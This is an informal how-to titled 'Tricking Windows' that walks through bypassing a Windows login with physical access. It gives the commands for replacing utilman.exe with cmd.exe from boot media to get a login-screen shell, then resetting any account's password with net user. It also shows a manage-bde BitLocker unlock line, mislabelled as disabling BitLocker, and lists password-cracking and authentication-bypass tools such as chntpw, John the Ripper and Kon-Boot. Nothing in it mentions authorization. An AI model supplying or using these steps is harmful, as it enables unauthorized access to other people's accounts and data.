Tricking Windows

Note : External Bootable media is required to make changes into the local file system, accessing the shell.

1. Create the Windows external bootable media.

2. Boot the windows into bootable mode, accessing the bios

3. On launching the setup we can access the CMF using "CTRL+F10"

4. The CMD terminal will open in which we can navigate to directories

C:/windows/System32

1. using the following command :

ren utilman.exe utilman2.exe
cp cmd.exe utilman.exe

1. On using these commands, exit the setup and then click on accessibility option in login screen. Yoo we got the CMD shell.

2. On passing the commands, we can change the password of any username

net user ##This will list all the available users in the current windows
net user <username> <password(new)> ## This will rename the password of the user

😊 Now we can directly login in the system with the new password Just entered.

How to disable Bitlocker using CMD

manage-bde -unlock E: -RecoveryPassword "mypassword"

---

Using Linux to Clear SAM file Hash codes

Tool used: chntpw

Chntpw (Offline NT Password & Registry Editor) is a popular tool used to reset or change passwords on Windows user accounts by modifying the Windows SAM (Security Account Manager) database. If you're looking for an alternative tool with similar functionality, you might consider the following options:

1. Ophcrack: Ophcrack is a free and open-source tool that uses rainbow tables to recover passwords on Windows systems. It can be effective in recovering simple passwords, but it may struggle with more complex or longer passwords.

2. PCUnlocker: PCUnlocker is a commercial tool that allows you to reset lost or forgotten passwords for local Windows accounts. It supports multiple versions of Windows and provides a user-friendly interface.

3. Trinity Rescue Kit (TRK): Trinity Rescue Kit is a versatile Linux-based rescue tool that includes various utilities for repairing and recovering systems, including password resetting.

4. LCP (LCPSoft): LCP (Local Computer Password) is a free and open-source password recovery tool that can be used to recover passwords from Windows SAM files.

5. John the Ripper: While primarily known as a password-cracking tool, John the Ripper can also be used to recover forgotten passwords from Windows SAM files.

6. Kon-Boot: Kon-Boot is a commercial tool that allows you to bypass Windows authentication by modifying the kernel during boot, effectively allowing you to log in without knowing the password.

7. Cain & Abel: Cain & Abel is a comprehensive security tool that includes password recovery capabilities along with other network and system analysis features.